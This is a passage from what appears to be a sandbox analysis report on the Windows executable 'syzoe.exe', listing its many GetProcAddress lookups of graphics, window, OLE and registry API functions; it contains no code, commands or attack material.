\"syzoe.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetACP (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter lstrcpynW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter IsValidLocale (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetSystemDefaultUILanguage (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoA (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultUILanguage (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetCommandLineW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ExitThread (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter UnhandledExceptionFilter (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RtlUnwind (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegUnLoadKeyW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegSaveKeyW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegRestoreKeyW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegReplaceKeyW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegLoadKeyW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegFlushKey (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegDeleteKeyW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegConnectRegistryW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter InitializeFlatSB (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollProp (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollPos (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollInfo (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollPos (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollInfo (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter _TrackMouseEvent (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_GetImageInfo (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_SetIconSize (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_GetIconSize (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_Write (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_Read (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_GetDragImage (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_DragShowNolock (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_DragMove (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_DragLeave (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_DragEnter (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_EndDrag (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_BeginDrag (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_Copy (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_LoadImageW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_GetIcon (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_Remove (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_DrawEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_Replace (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_Draw (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_SetOverlayImage (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_GetBkColor (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_SetBkColor (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_ReplaceIcon (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_Add (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_SetImageCount (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_GetImageCount (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_Destroy (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImageList_Create (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetOpenFileNameW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter UnrealizeObject (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter StretchDIBits (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter StretchBlt (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter StartPage (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter StartDocW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetWindowOrgEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetWinMetaFileBits (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetViewportOrgEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetTextColor (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetStretchBltMode (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetROP2 (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetPixel (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetMapMode (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetEnhMetaFileBits (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetDIBits (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetDIBColorTable (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetBrushOrgEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetBkMode (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetBkColor (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetAbortProc (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SelectPalette (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SelectObject (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SelectClipRgn (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SaveDC (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RoundRect (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RestoreDC (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Rectangle (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RectVisible (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RealizePalette (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Polyline (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Polygon (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter PolyBezierTo (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter PolyBezier (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter PlayEnhMetaFile (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Pie (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter PatBlt (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter MoveToEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter MaskBlt (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter LineTo (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter IntersectClipRect (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetWindowOrgEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetWinMetaFileBits (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetTextMetricsW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetTextExtentPoint32W (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetSystemPaletteEntries (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetStockObject (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetRgnBox (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetPixel (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetPaletteEntries (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetObjectW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetEnhMetaFilePaletteEntries (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetEnhMetaFileHeader (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetEnhMetaFileDescriptionW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetEnhMetaFileBits (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetDeviceCaps (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetDIBits (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetDIBColorTable (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetDCOrgEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetCurrentPositionEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetClipBox (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetBrushOrgEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetBitmapBits (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GdiFlush (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FrameRgn (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ExtTextOutW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ExtFloodFill (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ExcludeClipRect (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter EnumFontsW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter EnumFontFamiliesExW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter EndPage (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter EndDoc (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Ellipse (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DeleteObject (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DeleteEnhMetaFile (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DeleteDC (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateSolidBrush (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateRectRgn (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreatePenIndirect (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreatePalette (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateICW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateHalftonePalette (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateFontIndirectW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateDIBitmap (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateDIBSection (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateDCW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateCompatibleDC (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateCompatibleBitmap (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateBrushIndirect (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateBitmap (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CopyEnhMetaFileW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Chord (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter BitBlt (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Arc (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter AbortDoc (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter AlphaBlend (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CLSIDFromString (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter StringFromCLSID (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CoInitialize (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter IsEqualGUID (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SafeArrayPtrOfIndex (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SafeArrayPutElement (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SafeArrayGetElement (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SafeArrayUnaccessData (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SafeArrayAccessData (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SafeArrayGetUBound (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SafeArrayGetLBound (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SafeArrayCreate (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VariantChangeType (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VariantCopyInd (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VariantCopy (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VariantClear (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VariantInit (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetErrorInfo (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SysFreeString (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SysReAllocStringLen (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SysAllocStringLen (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ShellExecuteW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateWindowExW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter WindowFromPoint (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter WaitMessage (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter UpdateWindow (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter UnregisterClassW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter UnhookWindowsHookEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter TranslateMessage (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter TranslateMDISysAccel (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter TrackPopupMenu (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SystemParametersInfoW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ShowWindow (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ShowScrollBar (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ShowOwnedPopups (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetWindowsHookExW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetWindowTextW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetWindowPos (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetWindowPlacement (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetWindowLongW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetTimer (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetScrollRange (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetScrollPos (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetScrollInfo (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetRect (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetPropW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetParent (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetMenuItemInfoW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetMenu (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetForegroundWindow (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetFocus (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetCursorPos (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetCursor (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetClassLongW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetCapture (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetActiveWindow (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SendMessageA (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SendMessageW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ScrollWindow (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ScreenToClient (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RemovePropW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RemoveMenu (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ReleaseDC (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ReleaseCapture (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegisterWindowMessageW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegisterClipboardFormatW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegisterClassW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RedrawWindow (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter PtInRect (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter PostQuitMessage (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter PostMessageW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter PeekMessageA (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter PeekMessageW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter OffsetRect (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter MsgWaitForMultipleObjectsEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter MsgWaitForMultipleObjects (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter MessageBoxW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter MapWindowPoints (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter MapVirtualKeyW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter LoadKeyboardLayoutW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter LoadIconW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter LoadCursorW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter LoadBitmapW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter KillTimer (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter IsZoomed (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter IsWindowVisible (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter IsWindowUnicode (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter IsWindowEnabled (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter IsWindow (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter IsIconic (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter IsDialogMessageA (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter IsDialogMessageW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter IsChild (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter InvalidateRect (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter IntersectRect (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter InsertMenuItemW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter InsertMenuW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter InflateRect (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetWindowThreadProcessId (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetWindowTextW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetWindowRect (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetWindowPlacement (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetWindowLongW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetWindowDC (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetUpdateRect (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetTopWindow (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetSystemMenu (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetSysColorBrush (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetSysColor (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetSubMenu (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetScrollRange (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetScrollPos (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetScrollInfo (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetPropW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetParent (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetWindow (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetMessagePos (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetMessageExtraInfo (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetMenuStringW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetMenuState (UID: 00000000-00000328)\n \"syzoe.exe\" 